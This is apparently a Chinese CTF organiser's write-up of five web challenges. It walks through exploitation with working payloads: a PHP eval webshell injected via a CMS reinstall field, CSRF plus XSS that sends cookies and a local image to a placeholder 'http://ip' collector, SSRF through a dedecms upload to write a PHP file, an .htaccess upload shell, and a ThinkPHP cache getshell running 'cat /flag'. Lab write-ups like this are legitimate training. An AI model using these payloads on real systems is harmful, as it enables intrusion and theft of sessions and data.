巅峰极客Web - Writeup

\u524d\u8a00

\u8fd9\u6b21\u548c\u53e6\u5916\u4e00\u4e2a\u5e08\u5085\u5408\u4f5c\u51fa\u4e86\u51e0\u4e2aweb\uff0c\u51fa\u9898\u65f6\u95f4\u592a\u4ed3\u4fc3\uff0c\u6240\u4ee5\u5f88\u591a\u5730\u65b9\u6709\u8bb8\u8003\u8651\u4e0d\u5468\uff0c\u671b\u591a\u591a\u89c1\u8c05\u3002
\u63a5\u5230\u4efb\u52a1\u662f\u8bf4\u591a\u504f\u5411\u5b9e\u6218\uff0c\u90a3\u5c31\u53ea\u80fd\u7528\u4e00\u4e9b\u6700\u65b0\u7684CMS\u6765\u4e0a\u4e86\uff0c\u8fd9\u6b21\u9898\u76ee\u5927\u6982\u662fdedefun\u76841day\u5229\u7528\uff0c\u5176\u4f59\u7684\u5219\u662f\u7f51\u7edc\u516c\u5f00\u6f0f\u6d1e\u6216\u8005\u662f\u5e38\u89c4\u6e17\u900f\u601d\u8def\u5373\u53ef\u89e3\u51b3\u3002\u8fc7\u7a0b\u4e2d\u53d1\u73b0\u5404\u79cd\u5e08\u5085\u4eec\u76f4\u63a5\u638f\u51fa0day\u5c31\u662f\u5e72\uff0c\u5f88\u662f\u819c\u62dc\u5440 ~

pentest

\u76ee\u5f55\u626b\u63cf\u5f97\u5230file/file.php\uff0c\u7136\u540e\u731c\u6d4b\u53ef\u4ee5\u8de8\u76ee\u5f55\u5220\u9664\u6587\u4ef6

\u5220\u9664\u6587\u4ef6\u540e\u91cd\u88c5metinfo\uff0c\u91cd\u88c5\u7684\u65f6\u5019\u6570\u636e\u5e93\u540d\u586b\u5199:

met#*/@eval($_GET[1]);/*

\u5bc6\u7801\u586b\u5199\u4e3aroot\uff0c\u8fd9\u91cc\u63d0\u4e00\u53e5\uff0c\u7531\u4e8e\u5e73\u53f0\u7684\u7f51\u7edcacl\u95ee\u9898\uff0c\u6240\u6709\u7684\u73af\u5883\u90fd\u662f\u4e0d\u80fd\u5916\u8fdemysql\u7684\uff0c\u5bfc\u81f4\u4f1a\u6709\u4e00\u70b9\u5751\u3002

\u6700\u540e\u5c31\u662fgetshell\u62ffflag

mysqlonline

\u901a\u8fc7mysql\u6267\u884c\uff0c\u7ecf\u8fc7hex\u7f16\u7801\u540e\uff0c\u8f93\u51fa\u53ef\u4ee5\u9020\u6210xss
select 0x3c7363726970743e616c6572742831293c2f7363726970743e

\u7ed3\u5408csrf\u5373\u53ef\u6253\u5230\u540e\u53f0

<html>  <body>  <script>history.pushState(\'\', \'\', \'/\')</script>    <form action="http://love.lemon/runsql.php" method="POST">      <input type="hidden" name="sql" value="select 0x30783c736372697074207372633d687474703a2f2f69702f7873732f312e6a733e3c2f7363726970743e" />    </form>    <script>document.forms[0].submit();</script>  </body></html>

\u63d0\u4ea4\u3002
\u5176\u4e2d\u52a0\u8f7d\u7684js\u5185\u5bb9\u4e3a:

self.location = \'http://ip/x.php?v=aaa\'+btoa(document.cookie)+\'aaa\';

\u53ef\u4ee5\u4ece\u670d\u52a1\u5668\u4e0a\u9762\u77e5\u9053\uff0c\u6709\u7ba1\u7406\u5458\u767b\u5f55\u4e86\u540e\u53f0\uff0c\u4f46\u662f\u5730\u5740\u662f127.0.0.1\u7684\u3002

\u8bbf\u95ee: http://love.lemon/admin_zzzz666.php

\u63d0\u793a\u540e\u53f0\u53ea\u80fd\u662f127.0.0.1\u8fd9\u4e2a\u8bbf\u95ee\u3002
\u6240\u4ee5\u9700\u8981\u6539\u4e00\u4e0b\u524d\u9762\u7684csrf html

<html>  <body>  <script>history.pushState(\'\', \'\', \'/\')</script>    <form action="http://127.0.0.1/runsql.php" method="POST">      <input type="hidden" name="sql" value="select 0x30783c736372697074207372633d687474703a2f2f69702f7873732f312e6a733e3c2f7363726970743e" />    </form>    <script>document.forms[0].submit();</script>  </body></html>

\u7136\u540e\u4fbf\u53ef\u4ee5\u6253\u5230cookie

\u901a\u8fc7\u9875\u9762\u6e90\u7801\u83b7\u53d6\u53ef\u4ee5\u77e5\u9053\u4e00\u4e2a
./static/img/iamsecret_555.jpg

\u5916\u7f51\u76f4\u63a5\u8bbf\u95ee\u662f\u4e0d\u884c\u7684\uff0c\u4f1a403\uff0c\u9700\u8981\u901a\u8fc7xss\u6765\u83b7\u53d6\u56fe\u7247\u5185\u5bb9\u3002flag\u4e5f\u5728\u56fe\u7247\u4e0a\u9762\u3002

var love={ajax:function(){var a;try{a=new XMLHttpRequest()}catch(e){try{a=new ActiveXObject("Msxml2.XMLHTTP")}catch(e){try{a=new ActiveXObject("Microsoft.XMLHTTP")}catch(e){return false}}}return a},req:function(b,c,d,e){d=(d||"").toUpperCase();d=d||"GET";c=c||"";if(b){var a=this.ajax();a.open(d,b,true);if(d=="POST"){a.setRequestHeader("Content-type","application/x-www-form-urlencoded")}a.onreadystatechange=function(){if(a.readyState==4){if(e){e(a)}}};if((typeof c)=="object"){var f=[];for(var i in c){f.push(i+"="+encodeURIComponent(c[i]))}a.send(f.join("&"))}else{a.send(c||null)}}},get:function(a,b){this.req(a,"","GET",b)},post:function(a,b,c){this.req(a,b,"POST",c)}};function getBase64(img){    function getBase64Image(img,width,height) {//width\u3001height\u8c03\u7528\u65f6\u4f20\u5165\u5177\u4f53\u50cf\u7d20\u503c\uff0c\u63a7\u5236\u5927\u5c0f ,\u4e0d\u4f20\u5219\u9ed8\u8ba4\u56fe\u50cf\u5927\u5c0f        var canvas = document.createElement("canvas");        canvas.width = width ? width : img.width;        canvas.height = height ? height : img.height;        var ctx = canvas.getContext("2d");        ctx.drawImage(img, 0, 0, canvas.width, canvas.height);        var dataURL = canvas.toDataURL();        return dataURL;    }    var image = new Image();    image.crossOrigin = \'\';    image.src = img;    return new Promise((resolve,reject)=>{        image.onload =function (){            resolve(getBase64Image(image));//\u5c06base64\u4f20\u7ed9done\u4e0a\u4f20\u5904\u7406        }    });}getBase64(\'http://127.0.0.1/static/img/iamsecret_555.jpg\').then(base64 => {    love.post(      "http://ip/xss/x.php",      "v="+base64,      function(res){        console.log(res);      }    );}, err => {    console.log(err)})

\u83b7\u53d6\u56fe\u7247\u5185\u5bb9
X.php\u5185\u5bb9

<?phpheader(\'Access-Control-Allow-Origin: *\');file_put_contents(\'log.txt\',$_POST[\'v\);

\u6700\u540e\u4f1a\u83b7\u53d6\u5230\u56fe\u7247\uff0c\u5f53\u7136\u8fd9\u4e2a\u8fc7\u7a0b\u4e2d+\u4f1a\u88ab\u8f6c\u6362\u4e3a\u7a7a\u683c\uff0c\u6240\u4ee5\u540e\u9762\u8fd8\u8981\u8f6c\u6362\u56de\u6765\u3002

dedeFun

\u9898\u76ee\u63cf\u8ff0:

\u8fd0\u7ef4\u81ea\u5df1\u7684\u7f51\u7ad9\uff0c\u6211\u8fd8\u662f\u559c\u6b22\u7528shell\u7684\u65b9\u5f0f\uff0c\u8fd9\u6837\u80af\u5b9a\u6ca1\u4eba\u80fd\u65e5\u8fdb\u6765\u4e86\u30021.php<?phpif ($_SERVER[\'REMOTE_ADDR\ !== \'127.0.0.1\') {    die(\'Who are you? your ip is:\'.$_SERVER[\'REMOTE_ADDR\);}$_GET[\'a\($_GET[\'b\);?>

\u611f\u89c9\u5f88\u50bb\u7684\u6545\u4e8b\uff0c\u6ca1\u6cd5\uff0c\u4e0d\u77e5\u9053\u5982\u4f55\u53bb\u8bbe\u8ba1\u8fd9\u4e2a\u8003\u70b9\uff0c\u4f46\u662f\u4ece\u4e0a\u6765\u770b\uff0c\u80af\u5b9a\u662f\u9760ssrf\u7684\u70b9\u3002
\u8003\u70b9\u4fbf\u662f\u524d\u6bb5\u65f6\u95f4\u4e00\u4e2a\u601d\u8def\u5f88\u68d2\u7684\u6f0f\u6d1e\uff1a dedecms\u5229\u7528\u901a\u914d\u7b26\u627e\u540e\u53f0\u76ee\u5f55

\u5f53\u7136 getimagesize \u8fd9\u4e2a\u51fd\u6570\u8fd8\u53ef\u4ee5\u8fdc\u7a0bhttp\u8bf7\u6c42\uff0c\u5bfc\u81f4\u53ef\u4ee5\u8fdb\u884cssrf\uff0c\u6709\u5174\u8da3\u7684\u670b\u53cb\u53ef\u4ee5\u8ddf\u8fdbphp\u5185\u6838\u770b\u4e0b\u3002

\u6240\u4ee5\u63a5\u4e0b\u6765\u5c31\u6bd4\u8f83\u7b80\u5355\u4e86\uff0c\u76f4\u63a5\u5229\u7528\u672c\u8eab\u7684shell\u53bb\u64cd\u4f5c\u5373\u53ef\u3002

POST /tags.php HTTP/1.1Host: love.lemonCache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9,en;q=0.8,zh-TW;q=0.7,ja;q=0.6Cookie: YDAL_2132_saltkey=umJCWaoK; YDAL_2132_lastvisit=1531231707; YDAL_2132_ulastactivity=8d9ffh%2BiVUvLiWxFVmAltTKPHq5V9hUJ5PvDa4s84r553KMhDZMx; YDAL_2132_auth=a017j1pf9qMN%2F5Pa1g7C6kyv3ik6f%2B7eqtppI5c6sSWzI0ggQU5wSkRNDoXuXqvSSMnI%2BN3ObxEMn7jaaNJW; YDAL_2132_nofavfid=1; YDAL_2132_lip=10.211.55.2%2C1531237092; YDAL_2132_home_diymode=1Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 251dopost=save&_FILES[lsa][tmp_name]=http://127.0.0.1/1.php?a=assert%26b=file_put_contents($_GET[1],base64_decode($_GET[2]));%261=./uploads/soft/aaaa.php%262=PD9waHAgcGhwaW5mbygpOyA/Pg==&_FILES[lsa][name]=0&_FILES[lsa][size]=0&_FILES[lsa][type]=image/gif

babyweb

\u9996\u5148\u770b\u5230\u9996\u9875:

\u7528\u6237\u540d\[email protected]

\u731c\u6d4b\u5bc6\u7801\u4e3a\u5f31\u53e3\[email protected]
\u767b\u9646\u540e\u53d1\u73b0\u4efb\u610f\u6587\u4ef6\u4e0a\u4f20\uff0c\u4f46\u662f\u53ea\u80fd\u56fe\u7247\u683c\u5f0f

\u7528top100\u5bc6\u7801\u7206\u7834mysql\uff0c1q2w3e4r5t6y\uff0c\u8fd9\u91cc\u672c\u6765\u662f\u7528root\uff0c\u4f46\u662f\u6405\u5c4e\u592a\u591a\uff0c\u6539\u4e3a\u4e86babyweb

\u8fdb\u5165\u540e\u53d1\u73b0

\u7136\u540e\u66f4\u6539type\u7684json\u6570\u636e\u4e3a
{"0":"png","1":"gif","2":"jpg","3":"xxx","5":"htaccess"}
\u5373\u53ef\u4e0a\u4f20htaccess

AddType application/x-httpd-php .xxxphp_flag engine 1

\u4e0a\u4f20\u540e\uff0c\u5728file\u4e0b\u53ef\u4ee5\u770b\u5230\u6587\u4ef6\u540d

\u7136\u540e\u8bbf\u95ee../img/name.xxx\u5373\u53efshell

A Simple CMS

\u8003\u70b9\u5c31\u662fthinkphp\u7684\u7f13\u5b58getshell\u6f0f\u6d1e\uff0c\u5f53\u7136\u5148\u5f97\u53d1\u73b0\u5907\u4efd\u6587\u4ef6www.zip\uff0c\u7136\u540e\u8fdb\u884c\u5ba1\u8ba1\u3002

/* \u83b7\u53d6\u7f13\u5b58\u6570\u636e */if(empty($list)){    $list = S(\'sys_user_nickname_list\');}

\u5ba1\u8ba1\u4ee3\u7801\u53d1\u73b0\u66f4\u6539\u4e86\u6e90\u7801
\u56e0\u4e3a\u7528\u6237\u540d\u6709\u957f\u5ea6\u9650\u5236
\u4e8e\u662f\u76f4\u63a5\u8fd9\u6837\u5c31OK

%[email protected]`$_GET[c]`;//

\u7136\u540e\u5373\u53ef\u62ff\u5230shell

http://127.0.0.1:8097/Runtime/Temp/onethink_6d11f0be3af9c28d4120c8fd5fe65a40.php

http://127.0.0.1:8097/Runtime/Temp/onethink_6d11f0be3af9c28d4120c8fd5fe65a40.php?c=cat /flag>/tmp/flag